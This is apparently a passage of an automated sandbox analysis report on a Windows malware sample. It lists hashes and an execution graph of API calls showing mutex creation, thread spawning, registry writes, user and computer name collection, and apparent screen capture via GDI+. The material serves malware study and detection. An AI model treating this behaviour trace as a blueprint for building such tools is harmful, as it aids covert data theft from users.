                                                                                                                                                                                                                        • Instruction ID: 3f40fd10d4d425bea92e2e31a8384655c7c611b504f6dcc443eaa3331804b236
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7cb9366395d1bde9188d8c533a5f261ceadb32812a651fb702a2e83f45a32b03
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35513074A00205EFC700EFA5C986AAEBBB5FF48314F614869F800A73A1CB75AD41DB55

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 395 50e188-50e190 396 50e195-50e1a0 call 50e2a8 395->396
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1373506097.000000000050D000.00000020.00000001.01000000.00000003.sdmp, Offset: 0050D000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_50d000_BGUO31BLG4WQAOX9MA4VF71OJ1M.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 09d169ef1900046f7ce7e1bf77e8748954ffc49c1ae63b66a47293057210f428
                                                                                                                                                                                                                        • Instruction ID: bf7e67a2ca14f9f88d5219543bbc34b5992b7d1d8ea4abcf1bf777d69265ae53
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09d169ef1900046f7ce7e1bf77e8748954ffc49c1ae63b66a47293057210f428
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 73C04C396082059FE709DA95E95745C7BA4F7C47207B149A6E44092684D6345D018514

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 402 50e1a6 call 50e2a8
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1373506097.000000000050D000.00000020.00000001.01000000.00000003.sdmp, Offset: 0050D000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_50d000_BGUO31BLG4WQAOX9MA4VF71OJ1M.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 575cfdc9971c75ce22d5e503515edcdbe57f5f9347646bd74705614b1379d254
                                                                                                                                                                                                                        • Instruction ID: 377e0cd95b83e3719a63b237e411648d2ddc939ecfa33f4c2e7b80880894d1c9
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 575cfdc9971c75ce22d5e503515edcdbe57f5f9347646bd74705614b1379d254
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5FB01138A0000AEBCF08EA80C08B88CBF32BB88300BB00E80A080222808230AE00AA00
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1373506097.0000000000630000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_630000_BGUO31BLG4WQAOX9MA4VF71OJ1M.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: c93d8e922dfcd83e32f5765afd578857df8e1b348044725a28ebc662ede8c71c
                                                                                                                                                                                                                        • Instruction ID: c2ae97a1311e7220a76ef33778c4fd8d15fcd70bd0b75679caa397bf8e8ee31d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c93d8e922dfcd83e32f5765afd578857df8e1b348044725a28ebc662ede8c71c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7B17B71A001099BEF18DE68D8A17ED77B3FB84314F1981BCD84697B86D634AD96CBC0
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1373506097.0000000000630000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_630000_BGUO31BLG4WQAOX9MA4VF71OJ1M.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
                                                                                                                                                                                                                        • Instruction ID: 3aed54436f5767a83b01f55326dea564c088d466d319321e9a1229c6b183aa19
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DCC04C7595664CEBC711CB89D541A59B7FCE709650F100195EC0893700D5356E109595

                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                        Execution Coverage:4.2%
                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                        Signature Coverage:26.9%
                                                                                                                                                                                                                        Total number of Nodes:1365
                                                                                                                                                                                                                        Total number of Limit Nodes:9
                                                                                                                                                                                                                        execution_graph 35908 2f10042 35909 2f10050 35908->35909 35910 2f1005e 35908->35910 35911 2f100b4 57 API calls 35909->35911 35921 2f0e60c 35910->35921 35914 2f1005a 35911->35914 35918 2f1008c 35919 2f100ae 35918->35919 35952 2f17c06 35918->35952 35958 2f0dee7 35921->35958 35924 2f0e630 35926 2f0e5ef 35924->35926 35970 2f0e53d 35926->35970 35929 2f100b4 35930 2f100c2 35929->35930 35931 2f100df __fread_nolock 35929->35931 36021 2f10c5f 14 API calls _free 35930->36021 35935 2f10121 CreateFileW 35931->35935 35936 2f10105 35931->35936 35933 2f100c7 36022 2f10c72 14 API calls _free 35933->36022 35937 2f10153 35935->35937 35938 2f10145 35935->35938 36024 2f10c5f 14 API calls _free 35936->36024 36027 2f10192 49 API calls __dosmaperr 35937->36027 35995 2f1021c GetFileType 35938->35995 35939 2f100cf 36023 2f0ea28 25 API calls ___std_exception_copy 35939->36023 35944 2f1010a 36025 2f10c72 14 API calls _free 35944->36025 35945 2f100da 35945->35918 35947 2f10111 36026 2f0ea28 25 API calls ___std_exception_copy 35947->36026 35949 2f1011c 35949->35918 35950 2f1014e __fread_nolock 35950->35949 35951 2f10184 CloseHandle 35950->35951 35951->35949 35953 2f17c11 HeapFree 35952->35953 35954 2f17c3a _free 35952->35954 35953->35954 35955 2f17c26 35953->35955 35954->35919 36061 2f10c72 14 API calls _free 35955->36061 35957 2f17c2c GetLastError 35957->35954 35959 2f0df07 35958->35959 35960 2f0defe 35958->35960 35959->35960 35967 2f16820 37 API calls 3 library calls 35959->35967 35960->35924 35966 2f1825f 5 API calls std::_Lockit::_Lockit 35960->35966 35962 2f0df27 35968 2f17046 37 API calls __Getctype 35962->35968 35964 2f0df3d 35969 2f17073 37 API calls __cftoe 35964->35969 35966->35924 35967->35962 35968->35964 35969->35960 35971 2f0e565 35970->35971 35972 2f0e54b 35970->35972 35974 2f0e58b 35971->35974 35976 2f0e56c 35971->35976 35988 2f0e64b 14 API calls _free 35972->35988 35990 2f17e83 MultiByteToWideChar 35974->35990 35987 2f0e555 35976->35987 35989 2f0e665 15 API calls __wsopen_s 35976->35989 35977 2f0e59a 35979 2f0e5a1 GetLastError 35977->35979 35981 2f0e5c7 35977->35981 35993 2f0e665 15 API calls __wsopen_s 35977->35993 35991 2f10c3c 14 API calls 2 library calls 35979->35991 35981->35987 35994 2f17e83 MultiByteToWideChar 35981->35994 35982 2f0e5ad 35992 2f10c72 14 API calls _free 35982->35992 35986 2f0e5de 35986->35979 35986->35987 35987->35918 35987->35929 35988->35987 35989->35987 35990->35977 35991->35982 35992->35987 35993->35981 35994->35986 35996 2f10257 35995->35996 35997 2f10309 35995->35997 36008 2f10271 __fread_nolock 35996->36008 36045 2f10592 21 API calls __dosmaperr 35996->36045 35998 2f10335 35997->35998 36001 2f10313 35997->36001 35999 2f1035f PeekNamedPipe 35998->35999 36002 2f10300 35998->36002 35999->36002 36004 2f10317 36001->36004 36005 2f10326 GetLastError 36001->36005 36049 2f096b0 36002->36049 36003 2f10290 GetFileInformationByHandle 36003->36005 36009 2f102a6 36003->36009 36047 2f10c72 14 API calls _free 36004->36047 36048 2f10c3c 14 API calls 2 library calls 36005->36048 36008->36002 36008->36003 36028 2f104e4 36009->36028 36011 2f1038a 36011->35950 36016 2f1038c 7 API calls 36017 2f102d6 36016->36017 36018 2f1038c 7 API calls 36017->36018 36019 2f102ed 36018->36019 36046 2f104b1 14 API calls _free 36019->36046 36021->35933 36022->35939 36023->35945 36024->35944 36025->35947 36026->35949 36027->35950 36030 2f104fa 36028->36030 36029 2f102b2 36038 2f1038c 36029->36038 36030->36029 36056 2f0dff9 38 API calls 3 library calls 36030->36056 36032 2f1053e 36032->36029 36057 2f0dff9 38 API calls 3 library calls 36032->36057 36034 2f1054f 36034->36029 36058 2f0dff9 38 API calls 3 library calls 36034->36058 36036 2f10560 36036->36029 36059 2f0dff9 38 API calls 3 library calls 36036->36059 36039 2f103b2 FileTimeToSystemTime 36038->36039 36040 2f103a4 36038->36040 36041 2f103c4 SystemTimeToTzSpecificLocalTime 36039->36041 36042 2f103aa 36039->36042 36040->36039 36040->36042 36041->36042 36043 2f096b0 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 36042->36043 36044 2f102c3 36043->36044 36044->36016 36045->36008 36046->36002 36047->36002 36048->36002 36050 2f096b8 36049->36050 36051 2f096b9 IsProcessorFeaturePresent 36049->36051 36050->36011 36053 2f098e5 36051->36053 36060 2f098a8 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 36053->36060 36055 2f099c8 36055->36011 36056->36032 36057->36034 36058->36036 36059->36029 36060->36055 36061->35957 36062 2f09e25 36063 2f09e31 ___scrt_is_nonwritable_in_current_image 36062->36063 36088 2f09b4b 36063->36088 36065 2f09e38 36066 2f09f91 36065->36066 36076 2f09e62 ___scrt_is_nonwritable_in_current_image _unexpected ___scrt_release_startup_lock 36065->36076 36115 2f0a195 4 API calls 2 library calls 36066->36115 36068 2f09f98 36116 2f0dc4e 23 API calls _unexpected 36068->36116 36070 2f09f9e 36117 2f0dc12 23 API calls _unexpected 36070->36117 36072 2f09fa6 36073 2f09e81 36075 2f09f08 36103 2f00aa0 36075->36103 36076->36073 36078 2f09f02 36076->36078 36114 2f0dc28 37 API calls 4 library calls 36076->36114 36099 2f13d6d 36078->36099 36089 2f09b54 36088->36089 36118 2f0a37f IsProcessorFeaturePresent 36089->36118 36091 2f09b60 36119 2f0c469 10 API calls 2 library calls 36091->36119 36093 2f09b65 36098 2f09b69 36093->36098 36120 2f141d9 36093->36120 36095 2f09b80 36095->36065 36098->36065 36100 2f13d7b 36099->36100 36101 2f13d76 36099->36101 36100->36075 36183 2f138c8 49 API calls 36101->36183 36184 2eec6d0 Sleep CreateMutexA GetLastError 36103->36184 36111 2f00abf 36112 2f00a50 CreateThread CreateThread CreateThread 36111->36112 36113 2f00a90 Sleep 36112->36113 37143 2f008a0 36112->37143 37149 2f00930 36112->37149 37155 2f009c0 36112->37155 36113->36113 36114->36078 36115->36068 36116->36070 36117->36072 36118->36091 36119->36093 36124 2f202af 36120->36124 36123 2f0c488 7 API calls 2 library calls 36123->36098 36125 2f202bf 36124->36125 36126 2f09b72 36124->36126 36125->36126 36129 2f16456 36125->36129 36141 2f163a2 36125->36141 36126->36095 36126->36123 36130 2f16462 ___scrt_is_nonwritable_in_current_image 36129->36130 36146 2f12100 EnterCriticalSection 36130->36146 36132 2f16469 36147 2f19c3f 36132->36147 36135 2f16487 36161 2f164ad LeaveCriticalSection std::_Lockit::~_Lockit 36135->36161 36138 2f16482 36140 2f163a2 2 API calls 36138->36140 36139 2f16498 36139->36125 36140->36135 36142 2f163a9 36141->36142 36143 2f163ec GetStdHandle 36142->36143 36144 2f16452 36142->36144 36145 2f163ff GetFileType 36142->36145 36143->36142 36144->36125 36145->36142 36146->36132 36148 2f19c4b ___scrt_is_nonwritable_in_current_image 36147->36148 36149 2f19c75 36148->36149 36150 2f19c54 36148->36150 36162 2f12100 EnterCriticalSection 36149->36162 36170 2f10c72 14 API calls _free 36150->36170 36153 2f19c59 36171 2f0ea28 25 API calls ___std_exception_copy 36153->36171 36155 2f16478 36155->36135 36160 2f162ec 28 API calls 36155->36160 36156 2f19cad 36172 2f19cd4 LeaveCriticalSection std::_Lockit::~_Lockit 36156->36172 36158 2f19c81 36158->36156 36163 2f19b8f 36158->36163 36160->36138 36161->36139 36162->36158 36173 2f1a21a 36163->36173 36165 2f19ba1 36169 2f19bae 36165->36169 36180 2f184a9 6 API calls std::_Lockit::_Lockit 36165->36180 36166 2f17c06 _free 14 API calls 36168 2f19c03 36166->36168 36168->36158 36169->36166 36170->36153 36171->36155 36172->36155 36178 2f1a227 __Getctype 36173->36178 36174 2f1a267 36182 2f10c72 14 API calls _free 36174->36182 36175 2f1a252 RtlAllocateHeap 36176 2f1a265 36175->36176 36175->36178 36176->36165 36178->36174 36178->36175 36181 2f133e3 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 36178->36181 36180->36165 36181->36178 36182->36176 36183->36100 36185 2eec706 36184->36185 36186 2eec717 36184->36186 36185->36186 36187 2eec70a GetLastError 36185->36187 36191 2ef13c0 36186->36191 36187->36186 36188 2eec719 36187->36188 36431 2f0dc4e 23 API calls _unexpected 36188->36431 36190 2eec720 36192 2ef1410 36191->36192 36198 2ef142a 36191->36198 36432 2f03030 36192->36432 36194 2f096b0 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 36196 2ef1ae5 36194->36196 36195 2ef141f 36448 2ee61f0 36195->36448 36199 2ef1c50 36196->36199 36198->36194 36200 2ef1c8b 36199->36200 36201 2ef205a 36199->36201 36204 2f03030 70 API calls 36200->36204 36202 2f096b0 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 36201->36202 36203 2ef2072 36202->36203 36261 2eff060 36203->36261 36205 2ef1cd5 36204->36205 36206 2ee61f0 114 API calls 36205->36206 36207 2ef1ce0 36206->36207 36208 2ef1cff 36207->36208 36209 2ef2076 36207->36209 36756 2f05610 27 API calls 3 library calls 36208->36756 36769 2ee26a0 27 API calls 36209->36769 36212 2ef207b 36214 2f0ea38 25 API calls 36212->36214 36213 2ef1d2e 36215 2f05430 27 API calls 36213->36215 36216 2ef2080 36214->36216 36217 2ef1d4b 36215->36217 36770 2f0e4b9 67 API calls 4 library calls 36216->36770 36757 2f02f70 36217->36757 36220 2ef2086 36771 2f02ff0 27 API calls 36220->36771 36222 2ef209b 36224 2f03030 70 API calls 36222->36224 36223 2ef1e13 GetModuleFileNameA 36225 2ef1e50 36223->36225 36226 2ef20b6 36224->36226 36225->36225 36229 2f03f40 27 API calls 36225->36229 36772 2f02ff0 27 API calls 36226->36772 36227 2ef1d5d error_info_injector 36227->36212 36227->36223 36228 2ef1e09 error_info_injector 36227->36228 36228->36223 36232 2ef1e6c error_info_injector 36229->36232 36231 2ef20c9 36773 2f0dc4e 23 API calls _unexpected 36231->36773 36234 2ef1f04 36232->36234 36235 2ef20dc 36232->36235 36240 2ef1fd5 error_info_injector 36232->36240 36762 2f0ded0 28 API calls 36234->36762 36237 2f0ea38 25 API calls 36235->36237 36239 2ef20e1 36237->36239 36238 2ef1f1b 36238->36216 36242 2ef1f26 36238->36242 36240->36201 36240->36235 36241 2ef2050 error_info_injector 36240->36241 36241->36201 36763 2ee9ed0 GetFileAttributesA 36242->36763 36244 2ef1f31 36245 2ef1f49 36244->36245 36247 2ef1f42 CreateDirectoryA 36244->36247 36764 2ee9ed0 GetFileAttributesA 36245->36764 36247->36245 36248 2ef1f54 36250 2f03030 70 API calls 36248->36250 36259 2ef1f86 36248->36259 36251 2ef1f6f 36250->36251 36765 2eea8c0 28 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 36251->36765 36252 2ef1f94 36252->36231 36768 2f02ff0 27 API calls 36252->36768 36255 2ef1f7d 36766 2ef0e40 28 API calls 2 library calls 36255->36766 36256 2ef1fb1 36258 2f03030 70 API calls 36256->36258 36260 2ef1fcc 36258->36260 36767 2ee9ea0 68 API calls 36259->36767 36260->36226 36262 2eff098 36261->36262 36774 2ee78e0 36262->36774 36265 2f02f70 25 API calls 36266 2eff0b6 36265->36266 36267 2eff0e6 error_info_injector 36266->36267 36269 2f0087a 36266->36269 36790 2ee93d0 36267->36790 36272 2f0ea38 25 API calls 36269->36272 36270 2eff0f5 36904 2ee43e0 36270->36904 36274 2f00893 36272->36274 36277 2ee43e0 27 API calls 36278 2eff11b RegOpenKeyExA RegCloseKey 36277->36278 36279 2ee43e0 27 API calls 36278->36279 36280 2eff16b 36279->36280 36281 2f03030 70 API calls 36280->36281 36282 2eff189 36281->36282 36283 2ee61f0 114 API calls 36282->36283 36284 2eff190 36283->36284 36285 2f03030 70 API calls 36284->36285 36286 2eff1a5 36285->36286 36287 2ee61f0 114 API calls 36286->36287 36288 2eff1ac 36287->36288 36289 2eff1c3 GetUserNameA 36288->36289 36290 2eff216 36289->36290 36290->36290 36291 2f03f40 27 API calls 36290->36291 36292 2eff232 36291->36292 36934 2eeb250 GetComputerNameExW 36292->36934 36297 2eff293 36297->36297 36298 2f03f40 27 API calls 36297->36298 36299 2eff2ab 36298->36299 37074 2ee9e20 36299->37074 36302 2ee43e0 27 API calls 36303 2eff2cd 36302->36303 36304 2f03030 70 API calls 36303->36304 36305 2eff2e7 36304->36305 36306 2ee61f0 114 API calls 36305->36306 36307 2eff2f2 36306->36307 36308 2ee43e0 27 API calls 36307->36308 36309 2eff309 36308->36309 36310 2f03030 70 API calls 36309->36310 36311 2eff31f 36310->36311 36312 2ee61f0 114 API calls 36311->36312 36313 2eff32a 36312->36313 36314 2f03030 70 API calls 36313->36314 36315 2eff34d 36314->36315 36316 2ee61f0 114 API calls 36315->36316 36317 2eff358 36316->36317 36318 2f03030 70 API calls 36317->36318 36319 2eff37b 36318->36319 36320 2ee61f0 114 API calls 36319->36320 36321 2eff386 36320->36321 36322 2f03030 70 API calls 36321->36322 36323 2eff3a9 36322->36323 36324 2ee61f0 114 API calls 36323->36324 36325 2eff3b4 36324->36325 36326 2f03030 70 API calls 36325->36326 36327 2eff3d7 36326->36327 36328 2ee61f0 114 API calls 36327->36328 36329 2eff3e2 36328->36329 36330 2f03030 70 API calls 36329->36330 36331 2eff405 36330->36331 36332 2ee61f0 114 API calls 36331->36332 36333 2eff410 36332->36333 36334 2f03030 70 API calls 36333->36334 36335 2eff433 36334->36335 36336 2ee61f0 114 API calls 36335->36336 36337 2eff43e 36336->36337 36338 2f03030 70 API calls 36337->36338 36339 2eff461 36338->36339 36340 2ee61f0 114 API calls 36339->36340 36341 2eff46c 36340->36341 36342 2f03030 70 API calls 36341->36342 36343 2eff48d 36342->36343 36344 2ee61f0 114 API calls 36343->36344 36345 2eff498 36344->36345 36346 2f03030 70 API calls 36345->36346 36347 2eff4aa 36346->36347 36348 2ee61f0 114 API calls 36347->36348 36349 2eff4b5 36348->36349 36350 2f03030 70 API calls 36349->36350 36351 2eff4c7 36350->36351 36352 2ee61f0 114 API calls 36351->36352 36353 2eff4d2 36352->36353 36354 2f03030 70 API calls 36353->36354 36355 2eff4ef 36354->36355 36356 2ee61f0 114 API calls 36355->36356 36357 2eff4fa 36356->36357 37082 2f045e0 36357->37082 36359 2eff50e 36360 2f05430 27 API calls 36359->36360 36361 2eff528 36360->36361 36362 2f05430 27 API calls 36361->36362 36363 2eff545 36362->36363 36364 2f05430 27 API calls 36363->36364 36365 2eff562 36364->36365 36366 2f045e0 27 API calls 36365->36366 36367 2eff577 36366->36367 36368 2f05430 27 API calls 36367->36368 36369 2eff596 36368->36369 36370 2f045e0 27 API calls 36369->36370 36371 2eff5ab 36370->36371 36372 2f05430 27 API calls 36371->36372 36373 2eff5ca 36372->36373 36374 2f045e0 27 API calls 36373->36374 36375 2eff5df 36374->36375 36376 2f05430 27 API calls 36375->36376 36377 2eff5fe 36376->36377 36378 2f045e0 27 API calls 36377->36378 36379 2eff613 36378->36379 36380 2f05430 27 API calls 36379->36380 36381 2eff632 36380->36381 36382 2f045e0 27 API calls 36381->36382 36383 2eff647 36382->36383 36384 2f05430 27 API calls 36383->36384 36385 2eff666 36384->36385 36386 2f045e0 27 API calls 36385->36386 36387 2eff67b 36386->36387 36388 2f05430 27 API calls 36387->36388 36389 2eff69a 36388->36389 36390 2f045e0 27 API calls 36389->36390 36391 2eff6af 36390->36391 36392 2f05430 27 API calls 36391->36392 36393 2eff6ce 36392->36393 36394 2f045e0 27 API calls 36393->36394 36395 2eff6e3 36394->36395 36396 2f05430 27 API calls 36395->36396 36397 2eff702 36396->36397 36398 2f05430 27 API calls 36397->36398 36399 2eff724 36398->36399 36400 2f05430 27 API calls 36399->36400 36401 2eff746 36400->36401 36402 2f045e0 27 API calls 36401->36402 36405 2eff75b error_info_injector 36402->36405 36403 2f00383 36406 2f03030 70 API calls 36403->36406 36404 2f00458 36407 2f03030 70 API calls 36404->36407 36405->36403 36405->36404 36408 2f00399 36406->36408 36409 2f0046d 36407->36409 36410 2ee61f0 114 API calls 36408->36410 36411 2f03030 70 API calls 36409->36411 36412 2f003a4 36410->36412 36413 2f00482 36411->36413 36414 2f045e0 27 API calls 36412->36414 37086 2ee4d60 36413->37086 36416 2f003b8 36414->36416 36418 2f02f70 25 API calls 36416->36418 36417 2f00491 37096 2eecb00 27 API calls 36417->37096 36428 2f003c6 error_info_injector 36418->36428 36420 2f004a2 36421 2f03030 70 API calls 36420->36421 36422 2f004b7 36421->36422 36423 2ee61f0 114 API calls 36422->36423 36424 2f004c2 36423->36424 36425 2f05430 27 API calls 36424->36425 36426 2f004dc 36425->36426 36427 2f02f70 25 API calls 36426->36427 36427->36428 36429 2f096b0 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 36428->36429 36430 2f00876 36429->36430 36430->36111 36431->36190 36433 2f0305b 36432->36433 36434 2f03062 36433->36434 36435 2f03095 36433->36435 36438 2f030b4 36433->36438 36434->36195 36436 2f030ea 36435->36436 36437 2f0309c 36435->36437 36626 2ee25c0 27 API calls 2 library calls 36436->36626 36612 2f09aa5 36437->36612 36441 2f09aa5 std::_Facet_Register 27 API calls 36438->36441 36443 2f030a9 _Yarn 36438->36443 36441->36443 36442 2f030a2 36442->36443 36627 2f0ea38 36442->36627 36443->36195 36656 2ee5da0 36448->36656 36454 2ee62e9 error_info_injector 36458 2f096b0 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 36454->36458 36455 2ee630f 36456 2f0ea38 25 API calls 36455->36456 36459 2ee6314 __fread_nolock 36456->36459 36457 2ee625f error_info_injector 36457->36454 36457->36455 36460 2ee630b 36458->36460 36461 2ee6377 RegOpenKeyExA 36459->36461 36460->36198 36462 2ee63a6 RegQueryValueExA 36461->36462 36463 2ee63d0 RegCloseKey 36461->36463 36462->36463 36464 2ee6400 36463->36464 36464->36464 36671 2f03f40 36464->36671 36466 2ee6480 error_info_injector 36468 2f096b0 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 36466->36468 36467 2ee6418 error_info_injector 36467->36466 36469 2ee64a7 36467->36469 36470 2ee64a3 36468->36470 36471 2f0ea38 25 API calls 36469->36471 36470->36198 36472 2ee64ac RegOpenKeyExA 36471->36472 36474 2ee64ed RegSetValueExA 36472->36474 36475 2ee6517 RegCloseKey 36472->36475 36474->36475 36477 2ee6528 error_info_injector 36475->36477 36476 2ee65e6 36479 2f0ea38 25 API calls 36476->36479 36477->36476 36480 2ee65ce error_info_injector 36477->36480 36478 2f096b0 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 36481 2ee65e2 36478->36481 36482 2ee65eb 36479->36482 36480->36478 36481->36198 36686 2f115a7 36482->36686 36485 2ee6646 RegSetValueExA 36486 2ee6665 RegCloseKey 36485->36486 36487 2ee6676 error_info_injector 36486->36487 36488 2ee6734 36487->36488 36493 2ee671c error_info_injector 36487->36493 36489 2f0ea38 25 API calls 36488->36489 36492 2ee6739 __wsopen_s 36489->36492 36490 2f096b0 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 36491 2ee6730 36490->36491 36491->36198 36494 2f03030 70 API calls 36492->36494 36493->36490 36495 2ee67a0 36494->36495 36496 2ee61f0 74 API calls 36495->36496 36497 2ee67ab RegOpenKeyExA 36496->36497 36500 2ee67d9 __fread_nolock error_info_injector 36497->36500 36499 2ee6d64 36501 2f096b0 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 36499->36501 36500->36499 36502 2ee6d80 36500->36502 36503 2ee6829 RegQueryInfoKeyW 36500->36503 36504 2ee6d7c 36501->36504 36505 2f0ea38 25 API calls 36502->36505 36506 2ee6d58 RegCloseKey 36503->36506 36588 2ee68a8 error_info_injector 36503->36588 36504->36198 36507 2ee6d85 GdiplusStartup 36505->36507 36506->36499 36509 2ee6e39 36507->36509 36513 2ee6e13 GetDC 36507->36513 36508 2ee68b2 RegEnumValueA 36508->36588 36510 2ee7534 36509->36510 36511 2ee6e45 36509->36511 36709 2ee26a0 27 API calls 36510->36709 36690 2f053d0 27 API calls std::_Facet_Register 36511->36690 36520 2f03030 70 API calls 36513->36520 36514 2ee7539 36517 2f0ea38 25 API calls 36514->36517 36516 2f03f40 27 API calls 36516->36588 36519 2ee7552 GetUserNameA LookupAccountNameA GetSidIdentifierAuthority 36517->36519 36524 2f03030 70 API calls 36519->36524 36521 2ee6f8b 36520->36521 36523 2ee61f0 74 API calls 36521->36523 36525 2ee6f96 36523->36525 36527 2ee7626 36524->36527 36528 2f03030 70 API calls 36525->36528 36526 2f03030 70 API calls 36526->36588 36529 2ee61f0 74 API calls 36527->36529 36531 2ee6fb3 36528->36531 36530 2ee7631 36529->36530 36710 2ee2400 44 API calls 36530->36710 36532 2ee61f0 74 API calls 36531->36532 36534 2ee6fba 36532->36534 36535 2f03030 70 API calls 36534->36535 36536 2ee6fcf 36535->36536 36537 2ee61f0 74 API calls 36536->36537 36540 2ee6fd6 36537->36540 36538 2ee78c3 36541 2f0ea38 25 API calls 36538->36541 36539 2ee7649 error_info_injector 36539->36538 36542 2f03030 70 API calls 36539->36542 36545 2f03030 70 API calls 36540->36545 36543 2ee78c8 36541->36543 36544 2ee76b2 36542->36544 36546 2f0ea38 25 API calls 36543->36546 36547 2ee61f0 74 API calls 36544->36547 36549 2ee7002 36545->36549 36550 2ee78cd 36546->36550 36548 2ee76bd 36547->36548 36711 2ee2400 44 API calls 36548->36711 36552 2ee61f0 74 API calls 36549->36552 36551 2f0ea38 25 API calls 36550->36551 36554 2ee78d2 36551->36554 36553 2ee700d 36552->36553 36691 2f05430 36553->36691 36557 2ee7024 36559 2f05430 27 API calls 36557->36559 36558 2ee771a GetSidSubAuthorityCount 36560 2ee77d2 36558->36560 36581 2ee7734 error_info_injector 36558->36581 36570 2ee703b error_info_injector 36559->36570 36564 2f03f40 27 API calls 36560->36564 36561 2ee76d7 error_info_injector 36561->36543 36561->36558 36562 2ee7740 GetSidSubAuthority 36563 2f03030 70 API calls 36562->36563 36563->36581 36565 2ee7822 36564->36565 36567 2f03f40 27 API calls 36565->36567 36566 2ee61f0 74 API calls 36566->36581 36569 2ee786f 36567->36569 36568 2ee715f error_info_injector 36571 2f03030 70 API calls 36568->36571 36569->36550 36572 2ee789b error_info_injector 36569->36572 36570->36514 36570->36568 36574 2ee719f 36571->36574 36575 2f096b0 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 36572->36575 36576 2ee61f0 74 API calls 36574->36576 36578 2ee78bf 36575->36578 36577 2ee71aa 36576->36577 36579 2ee71b5 RegGetValueA 36577->36579 36580 2ee71b3 36577->36580 36578->36198 36582 2ee71e5 error_info_injector 36579->36582 36580->36579 36581->36538 36581->36560 36581->36562 36581->36566 36712 2ee2400 44 API calls 36581->36712 36583 2ee722f GetSystemMetrics 36582->36583 36584 2ee7226 GetSystemMetrics 36582->36584 36586 2ee7234 36583->36586 36585 2ee722d 36584->36585 36584->36586 36585->36583 36587 2f03030 70 API calls 36586->36587 36590 2ee724f 36587->36590 36588->36502 36588->36506 36588->36508 36588->36516 36588->36526 36589 2ee61f0 74 API calls 36588->36589 36589->36588 36591 2ee61f0 74 API calls 36590->36591 36592 2ee725a RegGetValueA 36591->36592 36598 2ee728f error_info_injector 36592->36598 36594 2ee72ca GetSystemMetrics 36596 2ee72d8 6 API calls 36594->36596 36597 2ee72d1 36594->36597 36595 2ee72d3 GetSystemMetrics 36595->36596 36599 2ee736b 36596->36599 36600 2ee73f8 6 API calls 36596->36600 36597->36595 36598->36594 36598->36595 36601 2f120a9 ___std_exception_copy 15 API calls 36599->36601 36608 2ee744f error_info_injector 36600->36608 36603 2ee7371 36601->36603 36602 2ee74e0 GdiplusShutdown 36605 2ee74f1 error_info_injector 36602->36605 36603->36600 36604 2ee7380 GdipGetImageEncoders 36603->36604 36611 2ee7394 36604->36611 36606 